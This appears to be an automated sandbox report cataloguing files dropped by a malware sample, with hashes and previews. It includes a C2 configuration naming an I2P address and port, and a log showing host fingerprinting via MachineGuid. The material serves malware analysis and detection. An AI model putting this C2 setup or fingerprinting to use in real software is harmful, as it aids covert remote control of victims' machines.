File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6692
Entropy (8bit):	3.7244020032282137
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbcM+MjOYHV4GZi5aM4UB89bzcDUZfLHxm:R6l7wVeJcM+MKYHsprB89bzcMfLxm
MD5:	EEADE911C2B31A7B695EFA12ACDF1BA5
SHA1:	01C8CF314531E53E7F1ADEED4B673C3BBA860273
SHA-256:	A8F7930CBD73152A31219EC5760CDFEF5EF0BAD0CCA637B343D841323964CE3F
SHA-512:	676BDADF969A24172D2FCCFAAC755E3D89ABF1880917B799172A839D5BA12F991C9FC86D3CB1920750C4CFE60294BA114889DFF70A022BF2A4B88C10765ECE67
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER75E3.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.414685630451273
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg771I9x+WpW8VYXYm8M4JD2+AFO9BPyq85/3u4p3YiSd:uIjfZI72/7VHJlBP/Y3YiSd
MD5:	B871D38362A6028B397BDC0260070BE0
SHA1:	9FA60FB0919A607D809503279999C48143906741
SHA-256:	7EA7EA0CA3F36570D708DA64C0D8DF293184B087AE64C7319A8C27F108837A7C
SHA-512:	65133C3D1F52024510B7957223BA24174B1BC5536FD07CE313ACB5D2F0F43EF42784BB8E1CEB75885F59A5192EC61193C2A4CDCF56BC19FF99A4A4A1A9078A1D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540574" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7602.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81434
Entropy (8bit):	3.0826592663433368
Encrypted:	false
SSDEEP:	1536:BhMrJCG3mWqBfN11MnxdVFHupcYkV2aSzrOPjUHL3/C2bkvRH1Axs019ry/3:BhMrJCG3mWqBfN11MnxdVFHupcYkV2aZ
MD5:	176DCE244DDCBF45DA0117CADA3080EB
SHA1:	CD1D82C3E3807F9EC588D9F176461696773E0CC6
SHA-256:	5CD2B51D1CF9B62F9744DAD635FD9F69FD5CF4F2793610E0BFC8FFE539C397DC
SHA-512:	DB5765571D330D75BBDD5D015DC5C53C4ED2C6FE0D0159B24F0B69EB895B624E5EB5984C01456BE45691D9DD0E3A9390234DC55281E46A4720DBF08B79E13C95
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7680.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6852273436228047
Encrypted:	false
SSDEEP:	96:TiZYW7UP1uoCtY9OYIWFHSIYEZGFtriA+Fldw2DWhvLawolMPxBIWb3:2ZDtyOHw+LawolMPx+Wb3
MD5:	98BCC3A5D49EEC8F131185A547106F27
SHA1:	3E7BE150E7BB72692B97F9387C9D89C085178D67
SHA-256:	EC9E9CF6F7D1501D10B3875552973FF9D2DF4282CDE9089FC526155C37672206
SHA-512:	EBFC9CC0B57F1AD2F80A43732746DDBC7B78C642C5BC4E3BB871936B0C3D2179E2C4A83CD548A531819D074FC0ABA36E06726052CAD25A72AE7114B230BBC010
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE49D.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Oct 12 18:31:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	633690
Entropy (8bit):	1.0048104466051435
Encrypted:	false
SSDEEP:	768:lDdwUH1zbXvmalsFCKM/b1X9LSsclyBNA112r3G6avKzs4Js/8cleRJK0pjdIB:ldRui/b1X9LPclyBNA112r2+s/8GvB
MD5:	3A96551F489DC9682F594BC3E237E9C5
SHA1:	CE323D70FC8F74C821CF673F49EF322AEC3D790A
SHA-256:	993128EC62686FDCD123B71B422410A121B393151F17D82EEA01073055904575
SHA-512:	0F7090C182F268805CDB4B515B9EF90CC9B3C8C3078C3CB208D52DD868277798670DED6D066CE39AD0A462BEF9F41E6DFD9FEE7A22ECBEB15583D1650F956EE1
Malicious:	false
Preview:	MDMP..a..... .......o..g............$...........(...8...........` ..........h...........`.......8...........T................\|..........\!..........H#..............................................................................eJ.......#......Lw......................T...........:..g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE625.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6730
Entropy (8bit):	3.7196194230656645
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbCacqQvYHV4GZi5aM4UB89bXRDf4fhb9m:R6l7wVeJCp3vYHsprB89bXR8fhb9m
MD5:	439E78AF878FCE76932B930A7CB99750
SHA1:	3A6972DFBDFD816634554DDAA637742F83E565D2
SHA-256:	1634B597E0A5F7981D0A9745970D45EF09D3CCB14562E7195961618747E590B6
SHA-512:	C9709A566A35C7D6CA4522525CCC1CBE617FD31BFA2814E70C70D45AF8EAE5E375A017F3E34F5FFB4C4863FD7D3C06C90419F89097D04B821E2E84C492DFB21D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE664.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.415003392147944
Encrypted:	false
SSDEEP:	48:cvIwWl8zsorJg771I9x+WpW8VYkYm8M4JD2+AFDQjyq85/3o4p3YiJd:uIjfoFI72/7VIJuQjtY3YiJd
MD5:	EAFA85883D8F618C8C77BB4404D69C3A
SHA1:	4BFD08E1482D9D8416217FB0B5689AC1C5A9BCD6
SHA-256:	47A6FF492637CEF5EFA8B6AF99E71FFEA0467A29366386A8B5F951F90CAA2599
SHA-512:	64C0A830C4BE02F3ED0E66AFA2803430A69980D1D1505E7F894EFB1CB57AF4EE8372B92FEFAF517CCECFA8A5EFE4A44EDBDAEB0CDABE1E889A480E0B03D06E6B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="540573" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE672.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83546
Entropy (8bit):	3.079738367223419
Encrypted:	false
SSDEEP:	1536:yABoNiKmhy9/uM32aSB1FHupcYkV2aSzrOPjUHL3/C2bkvRH1Axs02036APt:yABoNiKmhy9/uM32aSB1FHupcYkV2aSR
MD5:	54244C00267E84307BD3D46C41C54225
SHA1:	406EAAF9625DF680D18BEAD64AC78D3678A2DD5E
SHA-256:	7A5CD5E701427394A5FD3CCCE0ED6E9568565438B4B99D661078A4F58D2ED803
SHA-512:	B3BDF8BE0E093BAF9392D7D43289AF7ABDD1891D5CB6789DBF20E7B241A5A7696FBD940B572F4AD9B04421EFFC3A55BD33E37F055AF44D534AD2E65711ADC204
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE78C.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6853066287897627
Encrypted:	false
SSDEEP:	96:TiZYWXPFYrM6tNYCOYZWqvHSPYEZvctrikMflzwsUSPlatohMjxoaIEgb3:2ZD2nfNObYSNatohMjxoNEgb3
MD5:	8BF8263C0B6B1A0796EED7AAC4302B23
SHA1:	B7E582E0AAD4FB22047977F9C6213D0CB773DCDC
SHA-256:	4C0E34F9297C5F177518F7EA40E27C4A369172C7509BF8CC6DE9FC6A167C1B37
SHA-512:	6D3C24705D56E7CBFBC0552DED7B3C6215CADF6432E41CC1D2B9DD334C75D5CC4AD7A1137E39BDB6593BA40001E0459E949FABA0736656538FFB41C86D365F9D
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl

Download File

Process:	C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	3.2341395630162877
Encrypted:	false
SSDEEP:	12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
MD5:	40AB00517F4227F2C3C334F1D16B65B4
SHA1:	F8D57AF017E2209B4FB24122647FD7F71B67C87C
SHA-256:	4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
SHA-512:	75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
Malicious:	false
Preview:	C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115200
Entropy (8bit):	6.220212606349767
Encrypted:	false
SSDEEP:	1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:	BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:	0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:	A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:	5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2847
Entropy (8bit):	5.56450663056498
Encrypted:	false
SSDEEP:	48:CFdHW54yclDEDsXcm9FL4gU4bcPPu4bcPPTM94bcPPZ4bcPPA4bcPPL4bcPPcWIk:idH9NBJ9VT3YPpYPTNYP6YPTYPcYPVio
MD5:	247FAA2BC39CD77BE6DF201B9CF6CB0D
SHA1:	CCC66A863CF73E3737E5422F183ACAD3754A6717
SHA-256:	E56222C49E13BA0C717FAD3CFE126DD8EA59524E6A6C1486B688F47752FAF9B2
SHA-512:	2ECD9E8BCB073A0C848045147CC9AAE3B3950B723A42171F412317DEC842266AB612C20AA2D4C46CA853150AEE1BAE08962EE1D6D9C4B5708BA3638CCA78A2CD
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.0997449470012635
Encrypted:	false
SSDEEP:	6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:	26702FAAB91B6B144715714A96728F39
SHA1:	CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:	83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:	50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.259370376612282
Encrypted:	false
SSDEEP:	1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:	7A8E8A0842D8D65713DEE5393E806755
SHA1:	AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:	51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:	D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1021
Entropy (8bit):	5.447868717380615
Encrypted:	false
SSDEEP:	24:CFAGHS+5lGyclY7GfylD2BlD7cRE9FLxJsJ4b0ER+SXY0e:CFdHS+54yclDEDsXcm9FL4gpi
MD5:	18E6EDE868C38BD1A4854E37F6C3F9D1
SHA1:	DA50AAC964319AC42FC45D72D2604C9A356784D9
SHA-256:	3A6C102A8EB7961CB3839E3F4D25AB965D532F47F48DA1D55CBAA97B632E9E00
SHA-512:	A9FD0A27301D2C5BB7A8877D87FCF5F2CE104756F79C0F09E9F0259FD4872194E4F8D7DEF36C79608FE1DAA26F9683A9A99368C794402A67E3D6FADDDFB862E5
Malicious:	false
